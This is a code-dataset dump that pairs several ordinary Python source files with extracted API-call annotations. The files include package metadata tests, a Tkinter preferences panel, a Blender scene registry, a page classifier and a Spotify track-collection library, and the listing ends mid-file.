code stringlengths 22 1.05M | apis listlengths 1 3.31k | extract_api stringlengths 75 3.25M |
|---|---|---|
# -*- coding: utf-8 -*-
import re
import semantic_version
import pytest
import validators
from datetime import datetime
import quantopian_tools
def test_valid_pkg_name():
assert quantopian_tools
assert re.match(r'[a-z][a-z_.]+', quantopian_tools.__pkg_name__)
def test_valid_version():
assert semantic_version.validate(str(semantic_version.Version.coerce(quantopian_tools.__version__)))
def test_valid_release_date():
try:
datetime.strptime(quantopian_tools.__release_date__, '%m/%d/%Y')
except ValueError:
pytest.fail()
def test_valid_project_name():
assert quantopian_tools.__project_name__
def test_valid_project_description():
assert quantopian_tools.__project_description__
def test_valid_project_url():
assert validators.url(quantopian_tools.__project_url__)
def test_valid_license():
assert quantopian_tools.__license__ == 'BSD'
def test_valid_author():
assert quantopian_tools.__author__
assert validators.email(quantopian_tools.__author_email__)
def test_valid_maintainer():
assert quantopian_tools.__maintainer__
assert validators.email(quantopian_tools.__maintainer_email__)
| [
"semantic_version.Version.coerce",
"datetime.datetime.strptime",
"re.match",
"validators.email",
"pytest.fail",
"validators.url"
] | [((214, 270), 're.match', 're.match', (['"""[a-z][a-z_.]+"""', 'quantopian_tools.__pkg_name__'], {}), "('[a-z][a-z_.]+', quantopian_tools.__pkg_name__)\n", (222, 270), False, 'import re\n'), ((778, 826), 'validators.url', 'validators.url', (['quantopian_tools.__project_url__'], {}), '(quantopian_tools.__project_url__)\n', (792, 826), False, 'import validators\n'), ((981, 1032), 'validators.email', 'validators.email', (['quantopian_tools.__author_email__'], {}), '(quantopian_tools.__author_email__)\n', (997, 1032), False, 'import validators\n'), ((1118, 1173), 'validators.email', 'validators.email', (['quantopian_tools.__maintainer_email__'], {}), '(quantopian_tools.__maintainer_email__)\n', (1134, 1173), False, 'import validators\n'), ((455, 519), 'datetime.datetime.strptime', 'datetime.strptime', (['quantopian_tools.__release_date__', '"""%m/%d/%Y"""'], {}), "(quantopian_tools.__release_date__, '%m/%d/%Y')\n", (472, 519), False, 'from datetime import datetime\n'), ((341, 402), 'semantic_version.Version.coerce', 'semantic_version.Version.coerce', (['quantopian_tools.__version__'], {}), '(quantopian_tools.__version__)\n', (372, 402), False, 'import semantic_version\n'), ((551, 564), 'pytest.fail', 'pytest.fail', ([], {}), '()\n', (562, 564), False, 'import pytest\n')] |
from garterline import GarterLine
def example1():
line = GarterLine()
line.color("red")
line.text("Hello")
line.color("blue")
line.text("World")
return line
def example2():
percentReady90 = ["In", "other", "words", "it's", "almost", "completed"]
line = GarterLine()
line.color("blue", "green")
line.text(" ░ ".join(percentReady90))
return line
def example3():
line = GarterLine()
line.color("black", "blue")
line.text("SyntaxError")
line.color(background="lightblue")
line.text("(unicode error) 'unicodeescape'")
line.color(background="cyan")
line.text("codec can't decode bytes in position 0-1")
line.color(background="lightcyan")
line.text("truncated \\uXXXX escape")
return line
def clear(msg=""):
return GarterLine().text(msg).color()
#"Lisää viinaa silmät liikkuu :)"
print(clear("GarterLine examples"))
print(example1())
print(example2())
print(example3())
print(clear())
| [
"garterline.GarterLine"
] | [((62, 74), 'garterline.GarterLine', 'GarterLine', ([], {}), '()\n', (72, 74), False, 'from garterline import GarterLine\n'), ((287, 299), 'garterline.GarterLine', 'GarterLine', ([], {}), '()\n', (297, 299), False, 'from garterline import GarterLine\n'), ((418, 430), 'garterline.GarterLine', 'GarterLine', ([], {}), '()\n', (428, 430), False, 'from garterline import GarterLine\n'), ((800, 812), 'garterline.GarterLine', 'GarterLine', ([], {}), '()\n', (810, 812), False, 'from garterline import GarterLine\n')] |
import re
from arqtty_scrapper.page_types import Page_types
class Classifier:
def __init__(self, page_str):
self.page = page_str
def _is_404(self):
marker1 = 'Ой, ой, страничка потерялась'
marker2 = 'Спокойно! Логи записаны. Все будет исправлено.'
return re.search(marker1, self.page) and re.search(marker2, self.page)
def _is_user_blocked(self):
marker1 = "Пользователь '[\w\W]*' заблокирован"
return re.search(marker1, self.page)
def _is_alive(self):
marker1 = 'Лента действий'
return re.search(marker1, self.page)
def get_type(self):
if self._is_404():
return Page_types.E_404
elif self._is_user_blocked():
return Page_types.USER_BANNED
elif self._is_alive():
return Page_types.CORRECT
else:
return Page_types.UNDEFINED
| [
"re.search"
] | [((468, 497), 're.search', 're.search', (['marker1', 'self.page'], {}), '(marker1, self.page)\n', (477, 497), False, 'import re\n'), ((575, 604), 're.search', 're.search', (['marker1', 'self.page'], {}), '(marker1, self.page)\n', (584, 604), False, 'import re\n'), ((299, 328), 're.search', 're.search', (['marker1', 'self.page'], {}), '(marker1, self.page)\n', (308, 328), False, 'import re\n'), ((333, 362), 're.search', 're.search', (['marker2', 'self.page'], {}), '(marker2, self.page)\n', (342, 362), False, 'import re\n')] |
#!/usr/bin/env python
# Copyright (c) 2020 - for information on the respective copyright owner
# see the NOTICE file and/or the repository
# <https://github.com/boschresearch/amira-blender-rendering>.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""The scenes module contains scene managers for various setups."""
# base classes
from .basescenemanager import BaseSceneManager # noqa
from .baseconfiguration import BaseConfiguration # noqa
from .threepointlighting import ThreePointLighting # noqa
# composition classes, if inheritance should or cannot be used
from .rendermanager import RenderManager # noqa
# concrete scenes are autoimported later at the end of the file
import os
from functools import partial
from amira_blender_rendering.cli import _auto_import
_available_scenes = {}
def register(name: str, type: str = None):
"""Register a class/function to the specified available type.
This function should be used as a class decorator:
The name should be unique for the scene type that is being registered.
..code::
@register(name='awesome_sauce', type)
class AnotherClass(MyClass):
def __init__(self, ...)
...
Args:
name(str): Name for the scene to register
type(str): Either 'scene' or 'config' depending wheter the actual scene class
or the corresponding configuration class is registered
Returns:
The class that was passed as argument.
Raises:
ValueError: if invalid name/type given.
"""
def _register(obj, name, obj_type):
if obj_type not in ['scene', 'config']:
raise ValueError(f'Requested type {obj_type} is not available')
if name is None:
raise ValueError(f'Provide an appropriate name for the current scene of type {obj.__name__.lower()}')
if name not in _available_scenes:
_available_scenes[name] = dict()
_available_scenes[name][obj_type] = obj
return obj
return partial(_register, name=name, obj_type=type)
def get_registered(name: str = None):
"""
Return dictionary of available classes/function type registered via register(name, type)
Args:
name(str): name of registered object to query
"""
if name is None:
return _available_scenes
if name not in _available_scenes:
raise ValueError(f'Queried type "{name}" not among availables: {list(_available_scenes.keys())}')
return _available_scenes[name]
_auto_import(pkgname=__name__, dirname=os.path.dirname(__file__), subdirs=[''])
| [
"os.path.dirname",
"functools.partial"
] | [((2503, 2547), 'functools.partial', 'partial', (['_register'], {'name': 'name', 'obj_type': 'type'}), '(_register, name=name, obj_type=type)\n', (2510, 2547), False, 'from functools import partial\n'), ((3036, 3061), 'os.path.dirname', 'os.path.dirname', (['__file__'], {}), '(__file__)\n', (3051, 3061), False, 'import os\n')] |
#
# sn_agent/base.py - implementation of abstract class defining API for Network
# communication with block-chain implementations through connections with
# smart contracts and block-chain messaging systems.
#
# Copyright (c) 2017 SingularityNET
#
# Distributed under the MIT software license, see LICENSE file.
#
from sn_agent.agent.base import AgentABC
from sn_agent.network.enum import NetworkStatus
from sn_agent.ontology.service_descriptor import ServiceDescriptor
from enum import Enum
import logging
from sn_agent.agent.base import AgentABC
logger = logging.getLogger(__name__)
class TestAgent(AgentABC):
def __init__(self, app, agent_id):
super().__init__(app, agent_id)
logger.debug('Test Agent Started')
def can_perform(self, service: ServiceDescriptor) -> bool:
pass
def perform(self, service: ServiceDescriptor) -> bool:
pass
| [
"logging.getLogger"
] | [((561, 588), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (578, 588), False, 'import logging\n')] |
from noval import GetApp,_
import noval.iface as iface
import noval.plugin as plugin
import tkinter as tk
from tkinter import ttk,messagebox
import noval.preference as preference
from noval.util import utils
import noval.ui_utils as ui_utils
import noval.consts as consts
MAX_WINDOW_MENU_NUM_ITEMS = 30
##class WindowMenuService(wx.lib.pydocview.WindowMenuService):
## """description of class"""
## def InstallControls(self, frame, menuBar=None, toolBar=None, statusBar=None, document=None):
## wx.lib.pydocview.WindowMenuService.InstallControls(self,frame,menuBar,toolBar,statusBar,document)
## windowMenu = menuBar.GetWindowsMenu()
## windowMenu.Append(constants.ID_CLOSE_ALL,_("Close All"),_("Close all open documents"))
## wx.EVT_MENU(frame, constants.ID_CLOSE_ALL, frame.ProcessEvent)
##
## if wx.GetApp().GetUseTabbedMDI():
## windowMenu.Append(constants.ID_RESTORE_WINDOW_LAYOUT,_("&Restore Default Layout"),_("Restore default layout of main frame"))
## wx.EVT_MENU(frame, constants.ID_RESTORE_WINDOW_LAYOUT, frame.ProcessEvent)
## wx.EVT_MENU(frame, self.SELECT_MORE_WINDOWS_ID, frame.ProcessEvent)
##
## def ProcessEvent(self, event):
## """
## Processes a Window menu event.
## """
## id = event.GetId()
## if id == constants.ID_RESTORE_WINDOW_LAYOUT:
## ret = wx.MessageBox(_("Are you sure want to restore the default window layout?"), wx.GetApp().GetAppName(),
## wx.YES_NO | wx.ICON_QUESTION,wx.GetApp().MainFrame)
## if ret == wx.YES:
## wx.GetApp().MainFrame.LoadDefaultPerspective()
## return True
## elif id == constants.ID_CLOSE_ALL:
## wx.GetApp().MainFrame.OnCloseAllDocs(event)
## return Truefrom noval.util import utils
## else:
## return wx.lib.pydocview.WindowMenuService.ProcessEvent(self,event)
##
##
## def BuildWindowMenu(self, currentFrame):
## """
## Builds the Window menu and adds menu items for all of the open documents in the DocManager.
## """
## if wx.GetApp().GetUseTabbedMDI():
## currentFrame = wx.GetApp().GetTopWindow()
##
## windowMenuIndex = currentFrame.GetMenuBar().FindMenu(_("&Window"))
## windowMenu = currentFrame.GetMenuBar().GetMenu(windowMenuIndex)
##
## if wx.GetApp().GetUseTabbedMDI():
## notebook = wx.GetApp().GetTopWindow()._notebook
## numPages = notebook.GetPageCount()
##
## for id in self._selectWinIds:
## item = windowMenu.FindItemById(id)
## if item:
## windowMenu.DeleteItem(item)
##
## if windowMenu.FindItemById(self.SELECT_MORE_WINfrom noval.util import utilsDOWS_ID):
## windowMenu.Remove(self.SELECT_MORE_WINDOWS_ID)
## if numPages == 0 and self._sep:
## windowMenu.DeleteItem(self._sep)
## self._sep = None
##
## if numPages > len(self._selectWinIds):
## for i in range(len(self._selectWinIds), numPages):
## self._selectWinIds.append(wx.NewId())
## wx.EVT_MENU(currentFrame, self._selectWinIds[i], self.OnCtrlKeySelect)
##
## for i in range(0, min(numPages,utils.ProfileGetInt("WindowMenuDisplayNumber",wx.lib.pydocview.WINDOW_MENU_NUM_ITEMS))):
## if i == 0 and not self._sep:
## self._sep = windowMenu.AppendSeparator()
## if i < 9:
## menuLabel = "%s\tCtrl+%s" % (notebook.GetPageText(i), i+1)
## else:from noval.util import utils
## menuLabel = notebook.GetPageText(i)
## windowMenu.Append(self._selectWinIds[i], menuLabel)
##
## if numPages > wx.lib.pydocview.WINDOW_MENU_NUM_ITEMS: # Add the more items item
## if not windowMenu.FindItemById(self.SELECT_MORE_WINDOWS_ID):
## windowMenu.Append(self.SELECT_MORE_WINDOWS_ID, _("&More Windows..."))
##
##
## def _GetWindowMenuFrameList(self, currentFrame=None):
## """
## Returns the Frame associated with each menu item in the Window menu.
## """
## frameList = []
## # get list of windows for documents
## for doc in self._docManager.GetDocuments():
## for view in doc.GetViews():
## if hasattr(view,"GetType"):
## frame = view.GetFrame()
## if frame not in frameList:
## if frame == currentFrame and len(framimport noval.preference as preferenceeList) >= WINDOW_MENU_NUM_ITEMS:
## frameList.insert(WINDOW_MENU_NUM_ITEMS - 1, frame)
## else:
## frameList.append(frame)
## return frameList
##
## def OnSelectMoreWindows(self, event):
## """
## Called when the "Window/Select More Windows..." menu item is selected and enables user to
## select from the Frames that do not in the Window list. Useful when there are more than
## 10 open frames in the application.
## """
## frames = self._GetWindowMenuFrameList() # TODO - make the current window the first one
## strings = map(lambda frame: frame.GetTitle(), frames)
## # Should preselect the current window, but not supported by wx.GetSingleChoice
## res = wx.GetSingleChoiceIndex(_("Select a window to show:"),
## _("Select Window"),
## strings,
## wx.GetApp().MainFrame)
## if res == -1:
## return
## frames[res].SetFocus()
##
class WindowsOptionPanel(ui_utils.CommonOptionPanel):
"""
"""
def __init__(self, parent):
ui_utils.CommonOptionPanel.__init__(self, parent)
self._loadLayoutCheckVar = tk.IntVar(value=utils.profile_get_int("LoadLastPerspective", True))
loadLayoutCheckBox = ttk.Checkbutton(self.panel, text=_("Load the last window layout at start up"),variable=self._loadLayoutCheckVar)
loadLayoutCheckBox.pack(fill=tk.X)
## self._window_menu_display_number_ctrl = wx.TextCtrl(self, -1, str(config.ReadInt("WindowMenuDisplayNumber",wx.lib.pydocview.WINDOW_MENU_NUM_ITEMS)), size=(30,-1),\
## validator=NumValidator(_("Window Menu Display Number"),1,MAX_WINDOW_MENU_NUM_ITEMS))
## lsizer.AddMany([(wx.StaticText(self, label=_("Number of Window menus displayed") + "(%d-%d): " % \
## (1,MAX_WINDOW_MENU_NUM_ITEMS)),
## 0, wx.ALIGN_CENTER_VERTICAL), ((5, 5), 0),
## (self._window_menu_display_number_ctrl,
## 0, wx.ALIGN_CENTER_VERTICAL)])
self._hideMenubarCheckVar = tk.IntVar(value=utils.profile_get_int("HideMenubarFullScreen", False))
hideMenubarCheckBox = ttk.Checkbutton(self.panel, text= _("Hide menubar When full screen display"),variable=self._hideMenubarCheckVar)
hideMenubarCheckBox.pack(fill=tk.X)
self._useCustommenubarCheckVar = tk.IntVar(value=utils.profile_get_int("USE_CUSTOM_MENUBAR", False))
useCustommenubarCheckBox = ttk.Checkbutton(self.panel, text= _("Use custom menubar"),variable=self._useCustommenubarCheckVar)
useCustommenubarCheckBox.pack(fill=tk.X)
row = ttk.Frame(self.panel)
self._scaling_label = ttk.Label(row, text=_("UI scaling factor:"))
self._scaling_label.pack(fill=tk.X,side=tk.LEFT)
self._scaleVar = tk.StringVar(value=utils.profile_get('UI_SCALING_FACTOR',''))
scalings = sorted({0.5, 0.75, 1.0, 1.25, 1.33, 1.5, 2.0, 2.5, 3.0, 4.0})
combobox = ttk.Combobox(
row,
exportselection=False,
textvariable=self._scaleVar,
state="readonly",
height=15,
values=tuple(scalings),
)
combobox.pack(fill=tk.X,side=tk.LEFT)
row.pack(fill=tk.X)
clear_window_layout_btn = ttk.Button(self.panel, text=_("Clear Window layout configuration information"),command=self.ClearWindowLayoutConfiguration)
clear_window_layout_btn.pack(anchor=tk.W,pady=consts.DEFAUT_HALF_CONTRL_PAD_Y)
def OnOK(self, optionsDialog):
if utils.profile_get('UI_SCALING_FACTOR','') != self._scaleVar.get():
messagebox.showinfo(GetApp().GetAppName(),_("Scale changes will not appear until the application is restarted."),parent=self)
if utils.profile_get_int('USE_CUSTOM_MENUBAR',0) != self._useCustommenubarCheckVar.get():
messagebox.showinfo(GetApp().GetAppName(),_("Menubar changes will not appear until the application is restarted."),parent=self)
utils.profile_set("LoadLastPerspective", self._loadLayoutCheckVar.get())
utils.profile_set("HideMenubarFullScreen", self._hideMenubarCheckVar.get())
utils.profile_set("USE_CUSTOM_MENUBAR", self._useCustommenubarCheckVar.get())
scale = self._scaleVar.get()
if not scale:
scale = "default"
utils.profile_set("UI_SCALING_FACTOR", scale)
# config.WriteInt("WindowMenuDisplayNumber", int(self._window_menu_display_number_ctrl.GetValue()))
return True
def ClearWindowLayoutConfiguration(self):
config = GetApp().GetConfig()
config.DeleteEntry("DefaultPerspective")
config.DeleteEntry("LastPerspective")
messagebox.showinfo(GetApp().GetAppName(),_("Already Clear Window layout configuration information"))
class WindowServiceLoader(plugin.Plugin):
plugin.Implements(iface.CommonPluginI)
def Load(self):
preference.PreferenceManager().AddOptionsPanelClass(preference.ENVIRONMENT_OPTION_NAME,"Appearance",WindowsOptionPanel)
| [
"tkinter.ttk.Frame",
"noval.plugin.Implements",
"noval.GetApp",
"noval._",
"noval.util.utils.profile_set",
"noval.preference.PreferenceManager",
"noval.util.utils.profile_get_int",
"noval.ui_utils.CommonOptionPanel.__init__",
"noval.util.utils.profile_get"
] | [((10114, 10152), 'noval.plugin.Implements', 'plugin.Implements', (['iface.CommonPluginI'], {}), '(iface.CommonPluginI)\n', (10131, 10152), True, 'import noval.plugin as plugin\n'), ((6137, 6186), 'noval.ui_utils.CommonOptionPanel.__init__', 'ui_utils.CommonOptionPanel.__init__', (['self', 'parent'], {}), '(self, parent)\n', (6172, 6186), True, 'import noval.ui_utils as ui_utils\n'), ((7816, 7837), 'tkinter.ttk.Frame', 'ttk.Frame', (['self.panel'], {}), '(self.panel)\n', (7825, 7837), False, 'from tkinter import ttk, messagebox\n'), ((9585, 9630), 'noval.util.utils.profile_set', 'utils.profile_set', (['"""UI_SCALING_FACTOR"""', 'scale'], {}), "('UI_SCALING_FACTOR', scale)\n", (9602, 9630), False, 'from noval.util import utils\n'), ((8756, 8798), 'noval.util.utils.profile_get', 'utils.profile_get', (['"""UI_SCALING_FACTOR"""', '""""""'], {}), "('UI_SCALING_FACTOR', '')\n", (8773, 8798), False, 'from noval.util import utils\n'), ((8988, 9034), 'noval.util.utils.profile_get_int', 'utils.profile_get_int', (['"""USE_CUSTOM_MENUBAR"""', '(0)'], {}), "('USE_CUSTOM_MENUBAR', 0)\n", (9009, 9034), False, 'from noval.util import utils\n'), ((9996, 10054), 'noval._', '_', (['"""Already Clear Window layout configuration information"""'], {}), "('Already Clear Window layout configuration information')\n", (9997, 10054), False, 'from noval import GetApp, _\n'), ((6249, 6299), 'noval.util.utils.profile_get_int', 'utils.profile_get_int', (['"""LoadLastPerspective"""', '(True)'], {}), "('LoadLastPerspective', True)\n", (6270, 6299), False, 'from noval.util import utils\n'), ((6364, 6408), 'noval._', '_', (['"""Load the last window layout at start up"""'], {}), "('Load the last window layout at start up')\n", (6365, 6408), False, 'from noval import GetApp, _\n'), ((7242, 7295), 'noval.util.utils.profile_get_int', 'utils.profile_get_int', (['"""HideMenubarFullScreen"""', '(False)'], {}), "('HideMenubarFullScreen', False)\n", (7263, 7295), False, 'from noval.util import utils\n'), ((7362, 7404), 'noval._', '_', (['"""Hide menubar When full screen display"""'], {}), "('Hide menubar When full screen display')\n", (7363, 7404), False, 'from noval import GetApp, _\n'), ((7554, 7604), 'noval.util.utils.profile_get_int', 'utils.profile_get_int', (['"""USE_CUSTOM_MENUBAR"""', '(False)'], {}), "('USE_CUSTOM_MENUBAR', False)\n", (7575, 7604), False, 'from noval.util import utils\n'), ((7676, 7699), 'noval._', '_', (['"""Use custom menubar"""'], {}), "('Use custom menubar')\n", (7677, 7699), False, 'from noval import GetApp, _\n'), ((7889, 7912), 'noval._', '_', (['"""UI scaling factor:"""'], {}), "('UI scaling factor:')\n", (7890, 7912), False, 'from noval import GetApp, _\n'), ((8017, 8059), 'noval.util.utils.profile_get', 'utils.profile_get', (['"""UI_SCALING_FACTOR"""', '""""""'], {}), "('UI_SCALING_FACTOR', '')\n", (8034, 8059), False, 'from noval.util import utils\n'), ((8514, 8564), 'noval._', '_', (['"""Clear Window layout configuration information"""'], {}), "('Clear Window layout configuration information')\n", (8515, 8564), False, 'from noval import GetApp, _\n'), ((8878, 8948), 'noval._', '_', (['"""Scale changes will not appear until the application is restarted."""'], {}), "('Scale changes will not appear until the application is restarted.')\n", (8879, 8948), False, 'from noval import GetApp, _\n'), ((9130, 9202), 'noval._', '_', (['"""Menubar changes will not appear until the application is restarted."""'], {}), "('Menubar changes will not appear until the application is restarted.')\n", (9131, 9202), False, 'from noval import GetApp, _\n'), ((9827, 9835), 'noval.GetApp', 'GetApp', ([], {}), '()\n', (9833, 9835), False, 'from noval import GetApp, _\n'), ((10183, 10213), 'noval.preference.PreferenceManager', 'preference.PreferenceManager', ([], {}), '()\n', (10211, 10213), True, 'import noval.preference as preference\n'), ((9974, 9982), 'noval.GetApp', 'GetApp', ([], {}), '()\n', (9980, 9982), False, 'from noval import GetApp, _\n'), ((8856, 8864), 'noval.GetApp', 'GetApp', ([], {}), '()\n', (8862, 8864), False, 'from noval import GetApp, _\n'), ((9108, 9116), 'noval.GetApp', 'GetApp', ([], {}), '()\n', (9114, 9116), False, 'from noval import GetApp, _\n')] |
"""
This module is the main API used to create track collections
"""
# Standard library imports
import copy
import random
import inspect
import logging
import itertools
from typing import Any
from typing import List
from typing import Union
from typing import Tuple
from typing import Callable
from dataclasses import dataclass, field, asdict
# Third party imports
import numpy as np
import pandas as pd
import networkx as nx
# Local imports
import spotify_flows.database as database
from .login import login
from .data_structures import (
EpisodeItem,
SpotifyDataStructure,
TrackItem,
AudioFeaturesItem,
)
from .tracks import get_track_id, read_track_from_id
from .tracks import get_audio_features
from .albums import get_album_id
from .albums import get_album_songs
from .podcasts import get_show_id
from .podcasts import get_show_episodes
from .user import get_all_saved_tracks
from .user import get_recommendations_for_genre
from .artists import get_artist_id
from .artists import get_artist_albums
from .artists import get_related_artists
from .artists import get_artist_popular_songs
from .playlists import get_playlist_id
from .playlists import make_new_playlist
from .playlists import get_playlist_tracks
# Main body
logger = logging.getLogger()
class DatabaseNotLoaded(Exception):
pass
@dataclass
class TrackCollection:
"""Class representing a collection of tracks. Can be chained together through a
variety of defined methods."""
read_items_from_db = lambda id_, db: db.build_collection_from_collection_id(id_=id_)
sp = login(
scope="playlist-modify-private playlist-modify-public user-read-playback-position user-library-read"
)
id_: str = ""
info: SpotifyDataStructure = None
_items: List[Any] = field(default_factory=list)
_audio_features_enriched: bool = False
def copy(self):
return copy.copy(self)
@property
def _api_track_gen(self):
yield from self._items
@property
def _db_track_gen(self):
db = CollectionDatabase()
return db.load_playlist(playlist_id=self.id_)
@property
def exist_in_db(self):
db = CollectionDatabase()
return db.playlist_exists(self.id_) if db.is_loaded() else False
@property
def items(self):
if self._items:
yield from self._items
else:
if self.id_:
yield from self.item_gen()
else:
yield from iter(())
def item_gen(self):
db = CollectionDatabase()
if self.exist_in_db:
yield from self._db_track_gen
else:
logger.info(f"Retrieving items via API")
for track_dict in self._api_track_gen:
track = TrackItem.from_dict(track_dict)
if db.is_loaded():
db.add_track(track_item=track)
yield track
@classmethod
def from_id(cls, id_: str):
return cls(id_=id_)
@classmethod
def from_item(cls, id_: str, item: SpotifyDataStructure):
return cls(id_=id_, info=item)
@classmethod
def from_db(cls, id_: str, db_path: str):
db = database.SpotifyDatabase(db_path, op_table="table")
items = cls.read_items_from_db(id_=id_, db=db)
return TrackCollection(id_=id_, _items=items)
@classmethod
def from_name(cls, name: str):
name = name.replace("_", " ")
id_ = cls.func_get_id(name=name)
return cls(id_=id_)
def __str__(self) -> str:
return "\n".join([str(item) for item in self.items])
def __add__(self, other: "TrackCollection") -> "TrackCollection":
"""Defines the addition of two collections. Items get concatenated.
Returns:
TrackCollection: Collection object with combined items
"""
def new_items():
yield from self.items
yield from other.items
enriched = (self._audio_features_enriched) and (other._audio_features_enriched)
return TrackCollection(
id_="", _items=new_items(), _audio_features_enriched=enriched
)
def __radd__(self, other: "TrackCollection") -> "TrackCollection":
"""Used when building track collections from list of other track collections
Returns:
TrackCollection: Sum of two collections
"""
if other == 0:
return self
else:
return self + other
def __sub__(self, other: "TrackCollection") -> "TrackCollection":
"""Defines the substraction of two collections. Items from other get removed from items from self.
Returns:
TrackCollection: Collection object with modified items.
"""
other_items = list(other.items)
def new_items():
for item in self.items:
if item not in other_items:
yield item
enriched = self._audio_features_enriched
return TrackCollection(
id_="", _items=new_items(), _audio_features_enriched=enriched
)
def __truediv__(self, other: "TrackCollection") -> "TrackCollection":
"""Defines the division of two collections.
Returns:
TrackCollection: Items are intersection of self and other
"""
other_items = list(other.items)
def new_items():
for item in self.items:
if item in other_items:
yield item
enriched = self._audio_features_enriched
return TrackCollection(
id_="", _items=new_items(), _audio_features_enriched=enriched
)
def __mod__(self, other: "TrackCollection") -> "TrackCollection":
"""Defines the modulo of two collections
Returns:
TrackCollection: Items are alternates of self and other.
"""
def new_items():
for i, j in zip(self.items, other.items):
yield i
yield j
enriched = (self._audio_features_enriched) and (other._audio_features_enriched)
return TrackCollection(_items=new_items(), _audio_features_enriched=enriched)
def to_dataframes(self) -> Tuple[pd.DataFrame]:
"""Transforms items into dataframes, used for storage in database.
Returns:
Tuple[pd.DataFrame]: Representation of items as dataframes
"""
# Enrich with audio features
tracks = copy.copy(list(self.add_audio_features().items))
# Extract data
album_artist = [
{"album_id": track.album.id, "artist_id": artist.id}
for track in tracks
for artist in track.album.artists
]
all_tracks = [asdict(track) for track in tracks]
all_audio_features = [
{"track_id": track["id"], **track["audio_features"]} for track in all_tracks
]
all_albums = [asdict(track.album) for track in tracks]
all_artists = [artist for album in all_albums for artist in album["artists"]]
# Build dataframes
df_all_artists = pd.DataFrame(all_artists)
df_all_albums = pd.DataFrame(all_albums).drop(columns="artists")
df_audio_features = pd.DataFrame(all_audio_features)
df_all_tracks = pd.DataFrame(all_tracks)
df_all_tracks.loc[:, "album_id"] = df_all_tracks["album"].apply(
lambda x: x["id"]
)
df_all_tracks.drop(columns=["album", "audio_features"], inplace=True)
df_album_artist = pd.DataFrame(album_artist)
return (
df_all_tracks,
df_all_artists,
df_all_albums,
df_audio_features,
df_album_artist,
)
def shuffle(self) -> "TrackCollection":
"""Shuffle items
Returns:
TrackCollection: Object with items shuffled.
"""
new_items_list = copy.copy(list(self.items))
random.shuffle(new_items_list)
new_items = (item for item in new_items_list)
return TrackCollection(
_items=new_items, _audio_features_enriched=self._audio_features_enriched
)
def random(self, N: int) -> "TrackCollection":
"""Sample items randomly
Args:
N (int): Number of items to pick
Returns:
TrackCollection: Object with new items
"""
def new_items(N):
all_items = list(self.items)
k = min(N, len(all_items))
yield from random.sample(all_items, k=k)
return TrackCollection(
_items=new_items(N), _audio_features_enriched=self._audio_features_enriched
)
def remove_remixes(self) -> "TrackCollection":
"""Remove remixes from items
Returns:
TrackCollection: Object with new items
"""
banned_words = ["remix", "mixed"]
def new_items():
for item in self.items:
if all(
[
(banned_word not in item.name.lower())
for banned_word in banned_words
]
):
yield item
return TrackCollection(
_items=new_items(), _audio_features_enriched=self._audio_features_enriched
)
def sort(self, by: str, ascending: bool = True) -> "TrackCollection":
"""Sort items
Args:
by (str): Criteria used for sorting
ascending (bool, optional): Ascending order. Defaults to True.
Returns:
TrackCollection: Object with sorted items
"""
str_attr = f"item.{by}"
def new_items():
# Enrichment with audio features if needed
if by.startswith("audio_features") and not self._audio_features_enriched:
all_items = self._enrich_with_audio_features(items=self.items)
self._audio_features_enriched = True
else:
all_items = self.items
sorted_items = sorted(
list(all_items),
key=eval(f"lambda item: {str_attr}"),
reverse=(not ascending),
)
yield from sorted_items
return TrackCollection(
_items=new_items(), _audio_features_enriched=self._audio_features_enriched
)
def filter(self, criteria_func: Callable[..., Any]) -> "TrackCollection":
"""Filter items by certain criteria function
Args:
criteria_func (Callable[..., Any]): Criteria used for filtering
Returns:
TrackCollection: Object with filtered items
"""
# Enrichment with audio features if needed
def new_items():
if (
"audio_features" in inspect.getsource(criteria_func)
and not self._audio_features_enriched
):
self._audio_features_enriched = True
all_items = self._enrich_with_audio_features(items=self.items)
else:
all_items = self.items
for item in all_items:
if criteria_func(item):
yield item
return TrackCollection(
_items=new_items(), _audio_features_enriched=self._audio_features_enriched
)
def insert_at_time_intervals(self, other, time: int):
def new_items(time):
dups = itertools.tee(other.items, 20)
i_dup = 0
cum_time = 0
for item in self.items:
prev_cum_time = cum_time
cum_time += item.duration_ms / 1000 / 60
yield item
if cum_time % time < prev_cum_time % time:
yield from dups[i_dup]
i_dup += 1
cum_time = 0
return TrackCollection(_items=new_items(time))
def insert_at_time(self, other, time: int):
def new_items(time):
cum_time = 0
for item in self.items:
prev_cum_time = cum_time
cum_time += item.duration_ms / 1000 / 60
yield item
if cum_time % time < prev_cum_time % time:
yield from other.items
return TrackCollection(_items=new_items(time))
def insert_at_position(self, other, position: int):
def new_items(position):
before, after = itertools.tee(self.items, 2)
yield from itertools.islice(before, position)
yield from other.items
yield from after
return TrackCollection(_items=new_items(position))
def add_audio_features(self) -> "TrackCollection":
def new_items():
for item in self.items:
item.audio_features = AudioFeaturesItem.from_dict(
get_audio_features(track_ids=[item.id])[item.id]
)
yield item
return TrackCollection(_items=new_items(), _audio_features_enriched=True)
def _enrich_with_audio_features(self, items: List[TrackItem]) -> List[TrackItem]:
"""Get items enriched with audio features
Args:
items (List[TrackItem]): Items to enrich
Returns:
List[TrackItem]: Enriched items
"""
for item in items:
item.audio_features = AudioFeaturesItem.from_dict(
get_audio_features(track_ids=[item.id])[item.id]
)
yield item
def set_id(self, id_: str) -> "TrackCollection":
"""Add ID to collection, e.g. to use for storage in a database
Returns:
TrackCollection: Same collection, but with ID
"""
return TrackCollection(
id_=id_,
_items=self.items,
_audio_features_enriched=self._audio_features_enriched,
)
def remove_duplicates(self: "TrackCollection") -> "TrackCollection":
"""Remove duplicate tracks from items based on ID
Returns:
TrackCollection: Collection with no duplicate tracks
"""
# By ID
items = copy.copy(self.items)
idx = 0
while idx < len(items):
names = [item.name for item in items]
if items[idx].name in names[:idx]:
items.pop(idx)
else:
idx += 1
new_coll = copy.deepcopy(self)
new_coll._items = items
return new_coll
def first(self, n: int) -> "TrackCollection":
"""First n items
Returns:
TrackCollection: Collection with trimmed items
"""
new_items = itertools.islice(self.items, n)
return TrackCollection(
_items=new_items, _audio_features_enriched=self._audio_features_enriched
)
def to_playlist(self, playlist_name: str = None) -> None:
if playlist_name is None:
playlist_name = self.id_
